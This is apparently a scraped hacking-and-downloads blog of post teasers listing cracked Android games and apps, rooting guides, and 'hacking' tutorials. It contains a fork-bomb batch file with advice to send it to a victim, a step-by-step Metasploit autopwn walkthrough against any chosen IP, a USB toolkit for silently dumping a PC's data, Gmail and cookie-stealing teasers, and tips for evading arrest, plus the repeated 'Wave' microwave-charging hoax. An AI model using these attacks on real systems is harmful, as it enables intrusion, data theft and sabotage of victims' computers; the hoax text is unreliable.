Friday

what is wave in new i os 8???




“Wave is our latest and greatest addition to iOS8. Wave allows your device to be charged wirelessly through microwave frequencies. Wave can be used to quickly charge your device’s battery using any standard household microwave.

“Wave will become automatically activated when you update to iOS8. You can now wave-charge your device by placing it within a household microwave for a minute and a half. See below for details.

“iOS8 contains new drivers that interface with your device’s radio-baseband allowing it to synchronize with microwave frequencies and use them to recharge your battery.”


NOTE- DO NOT PUT UR I PHONE IN MICRO OVEN BECAUSE ITS WRONG .....




Read More

Grand Theft Auto: Vice City v1.02 Android Game

Grand Theft Auto: Vice City v1.02 Android Game
Requires Android 4.0 or Above

  

Description-
Welcome back to Vice City. Welcome back to the 1980s.
Read More

Fast & Furious 6: The Game (1.0.4) - Android

Fast & Furious 6: The Game (1.0.4) - Android
Requires Android 4.0 or Above


Description-
Step into the world of Fast & Furious 6. Earn cash and the respect of the “Fastest” drivers as you drift and drag through the London street scene. Join the Fast & Furious crew as they prepare to take on a series of jobs in an all new heist mode. Fast & Furious 6: The Game takes the mobile racing genre to greater heights with stunning graphics, new game modes, addictive challenges and intense full-throttle missions that dare you to exceed all limits.
Read More

Battlefield Bad Company 2 (1.28) - Android

Battlefield Bad Company 2 (1.28) - Android
Requires Android 4.0 or Above



Description-
Huge MultiPlayer Maps
Players can compete in 4-player teams in a variety of locales, each with a different gameplay focus and unique tactical challenges.
Read More

The Dark Knight Rises (1.1.3) - Android

The Dark Knight Rises (1.1.3) - Android
Requires Android 4.0 or Above




Description-
The epic conclusion to filmmaker Christopher Nolan’s Batman trilogy arrives on Android in the exclusive video game inspired by the movie.
Read More

Iron Man 3 (1.0.1) - Android

Iron Man 3 (1.0.1) - Android
Requires Android 4.0 or Above



Description-
Description: Become billionaire Tony Stark as Iron Man in this free, fast-paced, endless runner, the official game of the upcoming movie!
Read More

WhatsApp PLUS 6.15 cracked patched for hide lastseen...with all pro features


WhatsApp PLUS 6.15C CRACKED

 PATCHED FOR LAST SEEN









WhatsApp PLUS is a simple app that lets users customize even more aspects of WhatsApp, one of the most popular instant messaging apps in the world.

Thanks to WhatsApp PLUS, users can select from loads of different color palettes and backgrounds to decorate theirWhatsApp conversations.

To access all this new content you just have to open your options in WhatsApp and select ‘PLUS’. Once inside this improved version, you’ll be able to change your settings as desired and even customize conversations with each of your contacts.

WhatsApp PLUS is a very interesting alternative to the traditional WhatsApp, and lets you give a personal and unique touch to your conversations.
Read More

Gangstar Rio : City of Saints (1.1.3) -Android

Gangstar Rio : City of Saints (1.1.3) - Android
Requires Android 4.0 or Above



Description-
The acclaimed Gangstar series is back on Android devices to offer you a whole new place to have criminally good fun!
You’ll never experience a better way to discover Rio de Janeiro!
Read More

Grand Theft Auto III (1.3) - Android

Grand Theft Auto III (1.3) - Android
Requires Android 4.0 or Above


Description-
The sprawling crime epic that changed open-world games forever.
Read More

Asphalt 7 Heat (1.03) - Android

Asphalt 7 Heat (1.03) - Android
Requires Android 4.0 or Above


Description-
Hit the speed of heat in the newest, fastest, most visually stunning edition of the famed Asphalt series.

Read More

King of Fighter 98 Android Game

King of Fighter 98 Android Game
Requires Android 4.0 or Above


FEATURES:
★ The best game balance in the KOF Series!
“KOF ‘98” is praised among KOF fans around the world as being the ultimate compilation of “KOF ‘94” ~ “KOF ‘97” titles and for its fantastic game balance. Moreover, this perfect port of “KOF ‘98” features 2 different gameplay modes, “EXTRA” & “ADVANCED”, and also includes a “TRAINING MODE” where you can master all your combos! “KOF ‘98” is also compatible with Bluetooth game controllers for the best gameplay experience ever!!
Read More

Modern Combat 5 Blackout HD Android Game

Modern Combat 5 Blackout HD Android Game

Requires Android 4.0 or Above


Description-
Step into the action as the latest installment in the best FPS series raises the bar for shooter games once more! Create a squad, add your friends and test your individual and team skills against other squads in dynamic multiplayer warfare!


Read More

BlueStacks Version.0.8.10.3096 Rooted






~Run Bluestacks Setup

~ Install it

~ Open Bluestacks

~ Enjoy!!

CLICK To Dowanlod


Read More

How To root android device without PC

FRAMAROOT

Now you can root your android device without PC, just use framaroot. This app including several exploits named as the heroes of the book "The Lord of the Rings" Gandalf, Boromir, Pippin, Legolas, Sam, Frodo, Aragorn and Gimli. You can install Superuser and su binary on phone or tablet from android version 2.x to 4.x. All compatible devices can be found here. Unroot also very simple, just use this option in framaroot application.
How to install:
1. Download Framaroot from our site http://framaroot.net/
2. Run, choose Superuser or SuperSU
3. Select Boromir or another character
4. You will see :-)
5. Reboot device
6. Root- installed 
Read More

Thursday

Android phones Secret codes

ANDROID PHONES SECRET CODES TO FORMAT AND TO TEST.
Android Hidden Secret Codes For Samsung, HTC, Motorola, Sony, LG & More Devices
==================================================================================================================
##7764726 – Hidden service menu for Motorola Droid
==================================================================================================================
*#*#4636#*#*
This code can be used to get some interesting information about your phone and
Read More

Wednesday

3 Best VLC Media Player Tricks

The majority of the pc users Prefer VLC media Player as their default media player. The Reason for this is only on the grounds that VLC media player is smooth and Comes with numerous diverse Features. VLC media player can play practically all File designs that exists. 

Read More

How To Download Website For Offline Use


This is a full free open source software i recommended you to download web pages for offline use and then use in any computer and move anywhere you want.if you’re looking to make a complete offline version of your favorite website – not an individual web page, an entire web site – it’s one of the simplest options out there.
Read More

Top 20+ Websites To Download Free Ebooks

In this modern digital world we don't required pages to make a book.Because in this modern world we read ebooks instead of books.We can download Ebooks for our iPad,Kindle,Laptops,Phones etc etc etc because list is never ended.

There are a lot of websites where we can download Ebooks easily.But we have to pay some money to buy them.I think everyone loves money and no one want to pay for Ebooks.
Read More

Remotely Access Any Computer Using Chrome

You can access another computer using google chrome with out Rats system. 

it work on every computer if you have google chrome and you can download it by chrome app store.
Read More

Run Programs Without Installing in Windows



Do you know how to run programs without installing in windows pc? No, then I will tell you how to do that. most of people uses various software, and to save disk space you would like to uninstall some of them. While installing and then uninstalling programs is a tiresome process, it also junks the system registry which causes a slow performance of your system. In this article, I am going to introduce a new software installation system that works in a totally different way. You won’t need to install any program to run it i.e you can run programs without installing.

Read More

Chapter of HAcking

Chapter 1.0 - Introduction to Ethical Hacking
Introduction to Ethical Hacking
Can Hacking be Ethical
What does a Malicious Hacker Do?
Classification of Hackers
What do Ethical Hackers Do?
Modes of Ethical Hacking
Demo - BlindSide
................................................................................................

Chapter 2.0 - Footprinting

Read More

Explore Hacking Abilities with Android’s Best Hack Apps(Part- I)

Photo: Explore Hacking Abilities with Android’s Best Hack Apps(Part- I)

1. FaceNiff

Beware users – your Facebook and Twitter account over Wi-Fi can be hacked with the help of an app called ‘FaceNiff’. Installation of this app will detect the connection that will be using the same Wi-Fi network and allow user to access your social media accounts. With just one tap on screen, hackers can access any account logged in either on private or public network.

Mechanism:Cookie stealing over unencrypted connection, works best in College,School campuses

Tips to be safe: We advise you to enable ‘Secure browsing (https)’ for both your facebook and twitter account.
1. FaceNiff

Beware users – your Facebook and Twitter account over Wi-Fi can be hacked with the help of an app called ‘FaceNiff’. Installation of this app will detect the connection that will be using the same Wi-Fi network and allow user to access your social media accounts. With just one tap on screen, hackers can access any account logged in either on private or public network.

Mechanism:Cookie stealing over unencrypted connection, works best in College,School campuses

Tips to be safe: We advise you to enable ‘Secure browsing (https)’ for both your facebook and twitter account.

Read More

What is a Firewall?

A firewall is a tool that monitors communication to and from your computer. It sits between your computer and the rest of the network, and according to some criteria, it decides which communication to allow, and which communication to block. It may also use some other criteria to decide about which communication or communication request to report to you (either by adding the information to a log file that you may browse whenever you wish, or in an alert message on the screen), and what not to report.
Advantages of External Firewalls over Personal Firewalls
1. They do not take resources from the computer. This should be clear. This is especially useful when the firewall blocks flooding attacks.
2. It is harder (although in principle still possible) for a Trojan horse to disable it, because it does not reside in the same computer that the Trojan has infected. It is not possible to use the specific communication while totally bypassing the firewall.
3. They can be used without any dependence on the operating system onthe computer(s) they defend.
4. No instability problems.
Read More

HOW TO CREATE FORK BOMB VIRUS:

Its Just too easy to create, just follow the below steps.

1. Open Notepad on your PC and write this Code into it.

%0|%0

or copy it from here to your Notepad

2. Then save it with a .bat extension! When saving delete the .txt and input the File name and the .bat extension e.g fork.bat

3. Once anyone will do double click on this bat file, his system will Jamm and Crash.

NOTE: • Now you can send it to your Victim through Mail or from your Flash Drive to his PC and then once he hit the File, Forget it.

SOLUTION OR PREVENTIVE MEASURE TO TAKE

• Do not open any File with .bat on your PC.

• If you are already a victim of this Virus, Once you ON your PC, quickly Press ctrl + alt + delete key on your keyboard then Start the Task Manager, Now click on the Processes Tab and locate Fork.bat or anyname you Use, then put you mouse on it and click on the End Process Button, thats all.
Read More

EASY WEBSITE HACKING FOR BEGINNERS|A Complete Guide

EASY WEBSITE HACKING FOR BEGINNERS|A Complete Guide| :

REMEMBER :

RULE 1. Destruction of anyone's hard work is a shame and nothing to be proud of!!!
RULE 2. All my Tutorials are for Educational Purpose Only and as usual I vehemently refuse to accept any responsibility for its Misuse.
RULE 3. In no way will I accompany you to any correctional facility or help pay the fine Imposed for being stupid enough to get caught in the first place!
RULE 4. REMEMBER to REMEMBER THAT YOU NEED TO USE FIREFOX!!!

Read More

How To Unlock Any Phone

How To Unlock Any Phone

First Method :  >Take the phone locked with security code  >Press and hold the unlock button for a while without releasing it. the phone will display now press *  >Quickly press the star button and the phone will be unlocked If this method does not work you can try the second one

Second Method:  For this method you will needthe phone while its not locked. Orif you know the type of the phone just search on the internet for the serial number which you may find.  >While the phone is not yet locked, dial *#06# to get theimei  or serial number of the phone. Write it down somewhere  Now go to www.unlockitfree.com  >When the page loads, select, free remote master code  >In the area provided for imei/ serial number, insert the serial/ imei number of the phone.  Click on generate
Read More

Gmail Hacking Trick 2013—Method—-2

1. How To Hack Gmail Password Using Gmail Hacker [TUTORIAL] Need to hack Gmail passwords? It is possible and it is easy. This way of hacking into Gmail accounts was brought to my attention by a friend of mine who is a bit of a computer wizard. I have tried the method a least a dozen times and it has worked on all but 4 occasions, I don’t know the reason why it failed a couple of times, but on every other occasion it has got me the password for the requested email address. This is how it is done:
Read More

HACK any COMPUTER using IP address ONLY

Hi !! This Tutorial is HOW to HACK any COMPUTER using IP address ONLY

Photo: HACK any COMPUTER using IP address ONLY

Hi !! This Tutorial is HOW to HACK any COMPUTER using IP address ONLY

In this tutorial you’ll need

- Metasploit
- postgresql

Also: This only works on unpatched computer clients. So this tutorial will not work everytime, depending on the type of PC you’re going to hack.

Metasploit is constantly updated, and there are in fact working remote exploits for newer OSes in it.
HOWEVER, not all systems will be vulnerable due to a router, firewall, or something else in the way.
Furthermore, a fully patched system will of course be safe against MSF, as MSF is a public tool using a collection of public exploits.

Make sure you download the right programs with your OS system. ( The one which you’re currently supporting on your PC )

1. First you want to open up postgresql

Once its open:

Start —> All Programs —> PostgreSQL 9.0 —> pgAdmin III

Then right click on your server and click connect. Remember to keep this open the whole time, otherwise it will fail and you’ll have to restart again.

image

Now time to Start, First:

Start — > All Programs —> Metasploit Framework

Then open up the Metasploit GUI

Now in the CMD window type

db_connect postgres: ThePassYouChose@localhost:5432

Once Connected type in

db_host

If you are connected type:

db_nmap xx.x.x.xxx

Important: Replace xx.x.x.xxx with the IP you want to Hack

NOW IT’s TIME TO EXPLOIT:

Type i:

db_autopwn -t -p -e -s -b

After Sometime it Will Start. Once it is done type:

sessions -l

to see what the scanner found. If it worked you should see a list of exploits. Now once you’ve got the exploits to hack the computer, you’ll notice, that they’re all numbered, and named.

Just pick a name from the list and type in:

sessions -i YOUR EXPLOIT NAME HERE

sessions -i EXPLOIT NUMBER

Just Keep one thing in Mind whatever Exploit you Choose Remember to put sessions -i in front of it

In this tutorial you’ll need

- Metasploit
- postgresql

Read More

Hacking pc Using PenDrives:

Soooo here it IS

Hacking pc Using
PenDrives:
Note : Only For Educational Propose.>!!!
Download ToolKit From Here:
http://www.mediafire.com/download.php?5in0oo2uuf9tknn
Extract the software
open pcinfo folder
select all the files and paste it in your USB(pendrive)
it in the pc u wanna hack
Open the USB drive, give it 2 sec and and ur job is done...!!
And now open the dump folder in ur pc and u will have all the info u want
Ok now the problem which i was facing

Read More

My Fav Trick/hacking.!!!!-------------------------WEBSITE HACKING----------------------

-------------------------WEBSITE HACKING----------------------

Its the very first step when a true hacker thinks of hacking a website ... though all of us know the steps involving the in the hacking the website, most generous steps are as follows :

First, He (hacker) makes an image of entire website on his local pc
Second, He then browse the information and checks the places where the logs are being noted and also he scan the website for vulnerabilities ..
Thirdly, using various tools and methods (depending on how website is hosted) he gains admins credentials..
and
Forth , he defaces the website (or does what else he want to do)

----Download entire website in BACKTRACK to browse it offline-----

Read More

New Trick how to open block site...

This is the easiest way to bypass any blocked sites. You only need to get a working anonymous proxy with it’s port and put it into your web-browser. Get a proxy ip first. You can get lots of them from hidemyass.com. Select a ip of different country. You should select one that supports HTTPS so you will be able to access secure sites. Now just put the ip address and its port in your web-browser.
Here are the guides to change your ip. 

Read More

Cellphone Tracking

Cellphone Tracking 

Tracking cell phone calls with a SIM card requires the use of a SIM card reader. A SIM card stores all the information associated with a user's account. A card reader is required to access all the information on the SIM card, including contacts and call history. There are two types of card readers, readers and spoofers. The spoofers can clone the SIM card, which basically means the machine acts like a clone of the SIM card.

Skill level:Moderately Easy
Instructions

Things you need
SIM card reader

Read More

HACKING COMPUTER AND STEALING DATA - backtrack 5

In this Tutorial,I'll show you how you can -
# Make a Fake Webpage.
# Control Victim PC on LAN .
# Steal his files or destroy his PC.

For this you will need -
# Backtrack 5
# Internet Connection on a LAN
# Brain and Patience.

So Lets get it started.

Read More

COMPRESS 1GB Data into 10MB

FOR THOSE WHO DPN"T KNOW !

*************************************
COMPRESS 1GB Data into 10MB
*************************************
KGB Archiver is the compression tool that makes that happen.

Pros: -
Very high compression power with very accurate result and no
loss of data.

Cons: -
Due to high compression rate, the time requires to compress
and decompress the file is high.

Download Link - www.sourceforge.net/projects/kgbarchiver
Read More

15 Ways To Stay Out Of Jail [ Every Hacker must read ]

1. Never tell anyone you are a
Hacker OUT of your home....
2. Never Hack without a proxy.....or
Vpn
3. Always use a proxy when doing
anything remotely illegal...
4. Never Hack from your house
(always use WiFi or LAN from Cafe)
5. Never use your real name in a
conversation or sign up sheet..

Read More

About Me

Designed ByBlogger Templates